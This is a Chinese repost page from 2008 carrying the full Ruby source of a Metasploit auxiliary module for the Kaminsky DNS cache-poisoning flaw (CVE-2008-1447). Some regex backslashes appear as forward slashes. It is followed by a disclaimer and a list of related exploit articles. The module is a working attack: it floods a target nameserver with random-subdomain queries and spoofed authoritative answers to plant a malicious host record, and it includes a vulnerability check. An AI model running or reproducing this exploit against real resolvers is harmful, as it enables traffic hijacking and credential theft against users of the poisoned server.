DNS漏洞攻击代码
2008-07-29 10:22
441 查看
出处:
作者:hdm原文:http://metasploit.com/dev/trac/browser/framework3/trunk/modules/auxiliary/spoof/dns/baliwicked_host.rb?rev=5579#L1
require 'net/dns'
require 'scruby'
require 'resolv'
module Msf
class Auxiliary::Spoof::Dns::BaliWickedHost < Msf::Auxiliary
include Exploit::Remote::Ip
def initialize(info = {})
super(update_info(info,
'Name' => 'DNS BaliWicked Attack',
'Description' => %q{
This exploit attacks a fairly ubiquitous flaw in DNS implementations which
Dan Kaminsky found and disclosed ~Jul 2008. This exploit caches a single
malicious host entry into the target nameserver by sending random sub-domain
queries to the target DNS server coupled with spoofed replies to those
queries from the authoritative nameservers for the domain which contain a
malicious host entry for the hostname to be poisoned in the authority and
additional records sections. Eventually, a guessed ID will match and the
spoofed packet will get accepted, and due to the additional hostname entry
being within baliwick constraints of the original request the malicious host
entry will get cached.
},
'Author' => [ 'I)ruid', 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2008-1447' ],
[ 'US-CERT-VU', '8000113' ],
[ 'URL', 'http://www.caughq.org/exploits/CAU-EX-2008-0002.html' ],
],
'Privileged' => true,
'Targets' =>
[
["BIND",
{
'Arch' => ARCH_X86,
'Platform' => 'linux',
},
],
],
'DisclosureDate' => 'Jul 21 2008'
))
register_options(
[
OptPort.new('SRCPORT', [true, "The target server's source query port (0 for automatic)", nil]),
OptString.new('HOSTNAME', [true, 'Hostname to hijack', 'pwned.doxpara.com']),
OptAddress.new('NEWADDR', [true, 'New address for hostname', '1.3.3.7']),
OptAddress.new('RECONS', [true, 'Nameserver used for reconnaissance', '208.67.222.222']),
OptInt.new('XIDS', [true, 'Number of XIDs to try for each query', 10]),
OptInt.new('TTL', [true, 'TTL for the malicious host entry', 31337]),
], self.class)
end
def auxiliary_commands
return { "check" => "Determine if the specified DNS server (RHOST) is vulnerable" }
end
def cmd_check(*args)
targ = args[0] || rhost()
if(not (targ and targ.length > 0))
print_status("usage: check [dns-server]")
return
end
print_status("Using the Metasploit service to verify exploitability...")
srv_sock = Rex::Socket.create_udp(
'PeerHost' => targ,
'PeerPort' => 53
)
random = false
ports = []
lport = nil
1.upto(5) do |i|
req = Resolv::DNS::Message.new
txt = "spoofprobe-check-#{i}-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com"
req.add_question(txt, Resolv::DNS::Resource::IN::TXT)
req.rd = 1
srv_sock.put(req.encode)
res, addr = srv_sock.recvfrom()
if res and res.length > 0
res = Resolv::DNS::Message.decode(res)
res.each_answer do |name, ttl, data|
if (name.to_s == txt and data.strings.join('') =~ /^([^/s]+)/s+.*red/.metasploit/.com/m)
t_addr, t_port = $1.split(':')
print_status(" >> ADDRESS: #{t_addr} PORT: #{t_port}")
t_port = t_port.to_i
if(lport and lport != t_port)
random = true
end
lport = t_port
ports << t_port
end
end
end
end
srv_sock.close
if(ports.length < 5)
print_status("UNKNOWN: This server did not reply to our vulnerability check requests")
return
end
if(random)
print_status("PASS: This server does not use a static source port. Ports: #{ports.join(", ")}")
print_status(" This server may still be exploitable, but not by this tool.")
else
print_status("FAIL: This server uses static source ports and is vulnerable to poisoning")
end
end
def run
target = rhost()
source = Rex::Socket.source_address(target)
sport = datastore['SRCPORT']
hostname = datastore['HOSTNAME'] + '.'
address = datastore['NEWADDR']
recons = datastore['RECONS']
xids = datastore['XIDS'].to_i
ttl = datastore['TTL'].to_i
domain = hostname.match(/[^/x2e]+/x2e[^/x2e]+/x2e$/)[0]
srv_sock = Rex::Socket.create_udp(
'PeerHost' => target,
'PeerPort' => 53
)
# Get the source port via the metasploit service if it's not set
if sport.to_i == 0
req = Resolv::DNS::Message.new
txt = "spoofprobe-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com"
req.add_question(txt, Resolv::DNS::Resource::IN::TXT)
req.rd = 1
srv_sock.put(req.encode)
res, addr = srv_sock.recvfrom()
if res and res.length > 0
res = Resolv::DNS::Message.decode(res)
res.each_answer do |name, ttl, data|
if (name.to_s == txt and data.strings.join('') =~ /^([^/s]+)/s+.*red/.metasploit/.com/m)
t_addr, t_port = $1.split(':')
sport = t_port.to_i
print_status("Switching to target port #{sport} based on Metasploit service")
if target != t_addr
print_status("Warning: target address #{target} is not the same as the nameserver's query source address #{t_addr}!")
end
end
end
end
end
# Verify its not already cached
begin
query = Resolv::DNS::Message.new
query.add_question(hostname, Resolv::DNS::Resource::IN::A)
query.rd = 0
begin
cached = false
srv_sock.put(query.encode)
answer, addr = srv_sock.recvfrom()
if answer and answer.length > 0
answer = Resolv::DNS::Message.decode(answer)
answer.each_answer do |name, ttl, data|
if((name.to_s + ".") == hostname and data.address.to_s == address)
t = Time.now + ttl
print_status("Failure: This hostname is already in the target cache: #{name} == #{address}")
print_status(" Cache entry expires on #{t.to_s}... sleeping.")
cached = true
sleep ttl
end
end
end
end until not cached
rescue ::Interrupt
raise $!
rescue ::Exception => e
print_status("Error checking the DNS name: #{e.class} #{e} #{e.backtrace}")
end
res0 = Net::DNS::Resolver.new(:nameservers => [recons], :dns_search => false, :recursive => true) # reconnaissance resolver
print_status "Targeting nameserver #{target} for injection of #{hostname} as #{address}"
# Look up the nameservers for the domain
print_status "Querying recon nameserver for #{domain}'s nameservers..."
answer0 = res0.send(domain, Net::DNS::NS)
#print_status " Got answer with #{answer0.header.anCount} answers, #{answer0.header.nsCount} authorities"
barbs = [] # storage for nameservers
answer0.answer.each do |rr0|
print_status " Got an #{rr0.type} record: #{rr0.inspect}"
if rr0.type == 'NS'
print_status "Querying recon nameserver for address of #{rr0.nsdname}..."
answer1 = res0.send(rr0.nsdname) # get the ns's answer for the hostname
#print_status " Got answer with #{answer1.header.anCount} answers, #{answer1.header.nsCount} authorities"
answer1.answer.each do |rr1|
print_status " Got an #{rr1.type} record: #{rr1.inspect}"
res2 = Net::DNS::Resolver.new(:nameservers => rr1.address, :dns_search => false, :recursive => false, :retry => 1)
print_status "Checking Authoritativeness: Querying #{rr1.address} for #{domain}..."
answer2 = res2.send(domain)
if answer2 and answer2.header.auth? and answer2.header.anCount >= 1
nsrec = {:name => rr0.nsdname, :addr => rr1.address}
barbs << nsrec
print_status " #{rr0.nsdname} is authoritative for #{domain}, adding to list of nameservers to spoof as"
end
end
end
end
if barbs.length == 0
print_status( "No DNS servers found.")
srv_sock.close
disconnect_ip
return
end
# Flood the target with queries and spoofed responses, one will eventually hit
queries = 0
responses = 0
connect_ip if not ip_sock
print_status( "Attempting to inject a poison record for #{hostname} into #{target}:#{sport}...")
while true
randhost = Rex::Text.rand_text_alphanumeric(12) + '.' + domain # randomize the hostname
# Send spoofed query
req = Resolv::DNS::Message.new
req.id = rand(2**16)
req.add_question(randhost, Resolv::DNS::Resource::IN::A)
req.rd = 1
buff = (
Scruby::IP.new(
#:src => barbs[0][:addr].to_s,
:src => source,
:dst => target,
:proto => 17
)/Scruby::UDP.new(
:sport => (rand((2**16)-1024)+1024).to_i,
:dport => 53
)/req.encode
).to_net
ip_sock.sendto(buff, target)
queries += 1
# Send evil spoofed answer from ALL nameservers (barbs[*][:addr])
req.add_answer(randhost, ttl, Resolv::DNS::Resource::IN::A.new(address))
req.add_authority(domain, ttl, Resolv::DNS::Resource::IN::NS.new(Resolv::DNS::Name.create(hostname)))
req.add_additional(hostname, ttl, Resolv::DNS::Resource::IN::A.new(address))
req.qr = 1
req.ra = 1
p = rand(4)+2*10000
p.upto(p+xids-1) do |id|
req.id = id
barbs.each do |barb|
buff = (
Scruby::IP.new(
#:src => barbs[i][:addr].to_s,
:src => barb[:addr].to_s,
:dst => target,
:proto => 17
)/Scruby::UDP.new(
:sport => 53,
:dport => sport.to_i
)/req.encode
).to_net
ip_sock.sendto(buff, target)
responses += 1
end
end
# status update
if queries % 1000 == 0
print_status("Sent #{queries} queries and #{responses} spoofed responses...")
end
# every so often, check and see if the target is poisoned...
if queries % 250 == 0
begin
query = Resolv::DNS::Message.new
query.add_question(hostname, Resolv::DNS::Resource::IN::A)
query.rd = 0
srv_sock.put(query.encode)
answer, addr = srv_sock.recvfrom()
if answer and answer.length > 0
answer = Resolv::DNS::Message.decode(answer)
answer.each_answer do |name, ttl, data|
if((name.to_s + ".") == hostname and data.address.to_s == address)
print_status("Poisoning successful after #{queries} attempts: #{name} == #{address}")
disconnect_ip
return
end
end
end
rescue ::Interrupt
raise $!
rescue ::Exception => e
print_status("Error querying the DNS name: #{e.class} #{e} #{e.backtrace}")
end
end
end
end
end
end[code]
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- 利用DNS漏洞攻击的Ruby代码
- 服务器安全相关,及对应网络程序漏洞防攻击代码
- php防止sql注入漏洞代码 && 几种常见攻击的正则表达式
- PHP代码网站如何防范SQL注入漏洞攻击建议分享
- ProFTPd Local pr_ctrls_connect Vulnerability - ftpdctl 漏洞及攻击代码分析
- Google工程师发现公布XP漏洞 并提供攻击代码
- [Ph4nt0m]最新漏洞攻击代码[EXPL] Sun Solaris rpc.ypupdated Arbitrary Command Execution (Exploit)
- 标题: 这就是目前通杀所有操作系统的DNS攻击代码[zt]
- php防止ddos,dns,集群攻击的实现代码
- 演示XSS漏洞攻击 | 发帖如何提交javascript代码
- ProFTPD 1.3.0/1.3.0a (mod_ctrls support) Local Buffer Overflow Exploit漏洞及攻击代码分析(留个坑,以后自己填)
- 动网论坛上传文件漏洞的原理以及攻击的代码实现
- Internet Explorer 再爆危险漏洞 攻击代码已经出现
- DNS攻击代码
- 百度搜霸工具条出现下载任意文件执行漏洞 含攻击代码
- dns攻击包代码实现
- PHP代码网站如何防范SQL注入漏洞攻击建议
- 游戏安全资讯精选 2018年第八期:3975款游戏被查处,游戏圈重击;Memcached被利用UDP反射攻击漏洞预警;VentureBeat称区块链或可定位和消除恶意可执行代码的安全问题
- DNS 漏洞细节被泄露,攻击即将开始
- 我也要学C语言-第二十二章:给自己的代码找漏洞,然后自己攻击自己